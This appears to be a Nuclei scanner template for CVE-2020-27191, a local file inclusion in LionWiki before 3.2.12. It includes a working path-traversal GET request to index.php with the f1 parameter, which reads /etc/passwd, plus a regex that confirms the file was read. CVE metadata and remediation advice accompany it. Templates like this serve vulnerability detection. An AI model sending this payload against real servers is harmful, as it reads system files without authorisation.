Description
LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted strings in the index.php f1 variable, aka local file inclusion.
LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted strings in the index.php f1 variable, aka local file inclusion.
id: CVE-2020-27191
info:
name: LionWiki <3.2.12 - Local File Inclusion
author: 0x_Akoko
severity: high
description: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted strings in the index.php f1 variable, aka local file inclusion.
impact: |
An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data.
remediation: |
Upgrade LionWiki to version 3.2.12 or later to mitigate the LFI vulnerability.
reference:
- https://www.junebug.site/blog/cve-2020-27191-lionwiki-3-2-11-lfi
- http://lionwiki.0o.cz/index.php?page=Main+page
- https://nvd.nist.gov/vuln/detail/CVE-2020-27191
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-27191
cwe-id: CWE-22
epss-score: 0.09595
epss-percentile: 0.95221
cpe: cpe:2.3:a:lionwiki:lionwiki:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: lionwiki
product: lionwiki
tags: cve2020,cve,lionwiki,lfi,oss,vuln
http:
- method: GET
path:
- "{{BaseURL}}/index.php?page=&action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&restore=1"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
- type: status
status:
- 200
# digest: 4a0a0047304502210099bdc0adf325bb4629d873b4c79b49bedd3690537d007445edb639185bad6b2802204d608d76a9599a1f2073a73231d5e229448384f827e10eed381c03eb0af7f909:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.